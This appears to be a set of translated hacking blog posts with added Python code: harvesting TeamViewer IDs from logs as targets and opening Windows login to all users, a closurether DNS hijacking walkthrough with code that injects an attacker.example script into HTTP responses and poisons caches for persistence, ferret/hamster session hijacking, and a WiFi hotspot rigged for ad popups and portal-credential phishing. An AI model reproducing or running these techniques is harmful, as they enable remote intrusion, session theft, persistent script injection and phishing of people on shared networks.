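The two mechanical steps above, reading IDs out of Logfile.log and flipping Security_WinLogin, as an added Python example (not the post's own code). The shape of the log lines in the sample is assumed; the real file only needs to carry "From:" and "To:" followed by a numeric ID for the regex to work. The registry path and value meanings are the ones given above; set_security_winlogin is Windows-only and needs an elevated shell. The same parser is just as useful on the defending side, since it tells you which IDs have connected to or from a machine.

```python
import re
from collections import Counter

# Session lines in Logfile.log carry "From:" and "To:" followed by a TeamViewer ID.
# Only these two tokens are relied on; the rest of the line format is not assumed.
ID_TOKEN = re.compile(r"\b(From|To):\s*(\d{6,12})")


def session_ids(lines):
    """(direction, id) pairs in the order the text suggests: newest (bottom) first."""
    found = []
    for line in reversed(list(lines)):
        found.extend(ID_TOKEN.findall(line))
    return found


def infer_own_id(lines):
    """The ID that recurs in both directions is the machine the log came from."""
    counts = Counter(tv_id for _, tv_id in session_ids(lines))
    return counts.most_common(1)[0][0] if counts else None


def candidate_targets(lines):
    """Distinct IDs other than the host's own, most recent first."""
    own = infer_own_id(lines)
    seen, out = set(), []
    for _, tv_id in session_ids(lines):
        if tv_id != own and tv_id not in seen:
            seen.add(tv_id)
            out.append(tv_id)
    return out


def set_security_winlogin(value, key_path=r"SOFTWARE\TeamViewer\Version8"):
    """Windows only: the reg add step from the text. 1 = administrators only, 2 = all users."""
    if value not in (1, 2):
        raise ValueError("Security_WinLogin must be 1 or 2")
    import winreg
    with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        winreg.SetValueEx(key, "Security_WinLogin", 0, winreg.REG_DWORD, value)


# Constructed sample (not a real TeamViewer log); the IDs are placeholders.
SAMPLE_LOG = [
    "2014/12/20 10:01:02.001  Start Desktop process",
    "2014/12/20 10:01:05.120  Connection From: 100200300 To: 400500600",
    "2014/12/20 10:03:44.900  Connection From: 700800900 To: 100200300",
]
```

Typical use: candidate_targets(open(r"C:\Program Files\TeamViewer\Logfile.log", errors="ignore")) and then, if the Windows-login route is needed, set_security_winlogin(2) followed by restarting TeamViewer.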

Advantages

Hard to notice, no AV evasion needed, and it does not expose your IP.

Disadvantages

Easily noticed by an administrator who happens to be online, and then all the effort is wasted.

DNS Session Hijacking

After taking over the DHCP service I kept thinking: could I get at some of the intranet's connection information?

0x00 Preparation

System: Kali (under KVM), Windows XP (physical machine).
Network: hosts on the same subnet (they only need to reach each other).
Tools: Node.js, closurether.

0x01 Installation

wget http://nodejs.org/dist/v0.8.7/node-v0.8.7.tar.gz   # download
tar zxvf node-v0.8.7.tar.gz                              # unpack
cd node-v0.8.7
./configure
make                                                     # build
make install                                             # install
npm install -g closurether                               # install closurether

At this step you will usually hit an error.

SSL Error: SELF_SIGNED_CERT_IN_CHAIN

symlinking ../lib/node_modules/npm/bin/npm-cli.js -> /usr/local/bin/npm
updating shebang of /usr/local/bin/npm to /usr/local/bin/node
~/node-v0.8.7# npm install -g closurether
npm http GET https://registry.npmjs.org/closurether
npm http GET https://registry.npmjs.org/closurether
npm http GET https://registry.npmjs.org/closurether
npm ERR! Error: SSL Error: SELF_SIGNED_CERT_IN_CHAIN
npm ERR!     at ClientRequest.<anonymous> (/usr/local/lib/node_modules/npm/node_modules/request/main.js:440:26)
npm ERR!     at ClientRequest.g (events.js:185:14)
npm ERR!     at ClientRequest.EventEmitter.emit (events.js:88:17)
npm ERR!     at HTTPParser.parserOnIncomingClient [as onIncoming] (http.js:1455:

Solution

~/node-v0.8.7# npm install npm -g --ca=null
npm http GET https://registry.npmjs.org/npm
npm http 200 https://registry.npmjs.org/npm
npm http GET https://registry.npmjs.org/npm/-/npm-1.4.26.tgz
npm http 200 https://registry.npmjs.org/npm/-/npm-1.4.26.tgz
/usr/local/bin/npm -> /usr/local/lib/node_modules/npm/bin/npm-cli.js
[email protected] /usr/local/lib/node_modules/npm
~/node-v0.8.7# npm config set ca=""

Setting ca to an empty value makes npm use Node's own CA store instead of the outdated bundle shipped with this old npm, so TLS is still verified; do not "fix" the error with strict-ssl=false, which would turn off verification entirely. Then run

closurether   # start the DNS proxy

0x02 Configuration

Under /usr/local/lib/node_modules/closurether/asset/inject, open extern.js; JavaScript appended at its end is injected automatically into HTTP responses.
The URLs to inject into are listed in url.txt under /usr/local/lib/node_modules/closurether/tool/cache-sniffer.
The forged JS source is configured in config.json.
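
What the injection step amounts to on the proxy side, as an added Python example rather than closurether's own code: inject_script appends a <script> tag to an HTML response and corrects Content-Length, and poison_cache_headers strips the validators and sets a year-long max-age so the injected copy stays in the victim's browser cache after they leave the network, which is the persistence trick closurether relies on. The script URL (attacker.example) and the sample response are constructed; chunked or compressed responses are passed through untouched because they would have to be de-chunked or decompressed first.

```python
import re


def split_response(raw):
    """Split a raw HTTP/1.x response into (status_line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response head")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name):
    """Case-insensitive lookup; name is lower-case bytes."""
    for k, v in headers:
        if k.lower() == name:
            return v
    return None


def join_response(status, headers, body):
    return b"\r\n".join([status] + [k + b": " + v for k, v in headers]) + b"\r\n\r\n" + body


def inject_script(raw, script_src):
    """Add <script src=...> before </body> of an HTML response and fix Content-Length.
    Chunked or compressed responses are returned unchanged."""
    status, headers, body = split_response(raw)
    ctype = get_header(headers, b"content-type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return raw
    if get_header(headers, b"transfer-encoding") or get_header(headers, b"content-encoding"):
        return raw
    tag = b'<script src="' + script_src.encode("ascii") + b'"></script>'
    m = re.search(rb"</body\s*>", body, re.IGNORECASE)
    body = body[:m.start()] + tag + body[m.start():] if m else body + tag
    headers = [(k, v) for k, v in headers if k.lower() != b"content-length"]
    headers.append((b"Content-Length", str(len(body)).encode("ascii")))
    return join_response(status, headers, body)


def poison_cache_headers(raw, max_age=365 * 24 * 3600):
    """Make the injected copy survive after the victim leaves the hostile network:
    drop validators so the browser never revalidates, and declare it fresh for a year."""
    status, headers, body = split_response(raw)
    drop = {b"etag", b"last-modified", b"expires", b"cache-control", b"pragma", b"vary"}
    headers = [(k, v) for k, v in headers if k.lower() not in drop]
    headers.append((b"Cache-Control", b"public, max-age=" + str(max_age).encode("ascii")))
    return join_response(status, headers, body)


# Constructed sample response for the example (38-byte body).
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                   b"ETag: \"abc\"\r\nContent-Length: 38\r\n\r\n"
                   b"<html><body><p>hello</p></body></html>")
```

The cache step is why the attack outlives the session: a page or library cached with a long max-age and no validators is served from disk on every later visit, from any network, until the user clears the cache. HTTPS responses never reach this code, which is the real limit of the technique.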

0x03 Session hijacking

Run

tcpdump -i <interface> -w filename.cap

Then process the capture with ferret; it writes a hamster.txt into the current directory automatically.

ferret -r filename.cap

Start the hamster proxy

hamster

0x04 urlsnarf hijacking

urlsnarf

Tip: running urlsnarf interferes with SSL connections, so it is better left off.

End.
Most of this was learned from [email protected]

DIY: Turning a Commercial WiFi Hotspot into a Marketing Hotspot

This started as a hands-on look at WiFi with the high-power directional board-mounted card I bought a year ago.
I'm a loyal Windows user, but Windows is fussy, and "360 Free WiFi" is stingy, hiding most WiFi settings behind a "hardware not supported" excuse, so I settled on "猎豹免费WiFi" (Liebao Free WiFi).

First install it the normal way.

When I saw http://hi.liebao.cn:8735 I assumed Liebao kept the local configuration in the cloud and that this would be a dead end.
But pinging hi.liebao.cn showed that the domain does not exist. A look at the local listening ports:

Image      PID   Address           Port  Protocol  Firewall status
kwifi.exe  1520  Unspecified IPv4  8735  TCP       Allowed, unrestricted

It clicked: Liebao runs its own DNS server locally, resolves hi.liebao.cn to the host, and kwifi.exe serves the page on port 8735.

The software then points clients at the welcome page, http://hi.liebao.cn:8735.
P.S. If you want the page on port 80, a simple port-forwarding shell script is enough.

If you only want to change the avatar, go to

Drive:\Install Path\kingsoft\kwifi\data\httproot\static\css\images

where my1.jpg ~ my4.jpg are the person images for the different templates; replace them as you like.

If you want to change the whole page:
Drive:\Install Path\kingsoft\kwifi\data\httproot\httproot.html
is the home page.
Liebao's built-in HTTP server seems to serve static HTML only, with no ASP/PHP, so we cannot build much marketing logic on it.
But we can do this:

<script>
    window.open('AD_NETWORK_URL_1')
    window.open('AD_NETWORK_URL_2')
    window.open('AD_NETWORK_URL_3')
</script>

As soon as a user opens the page it pops up a pile of ads. (Mobile browsers had no popup blocking anyway.)

Since some vendors such as Coolpad have added popup blocking, we can instead play on the user's eagerness to get online with

<a href="PROMO_LINK">Click to get online</a>

so that the user clicks through themselves.

Alternatively, run IIS on the machine and phish for CMCC/ChinaNet/AirPort portal credentials.
I also suspect kwifidev.dat holds the DNS resolution configuration and more; I don't know it well, so I did not dig further. (It could be used for phishing too.)

The card was unstable, probably because the supply is only 0.5 A; I'm considering an external 1 A supply.

I seem to have drifted off topic.

_(:3_J/)_ This post is for technical exchange only; do not put it into practice.

Never connect to WiFi hotspots you do not trust!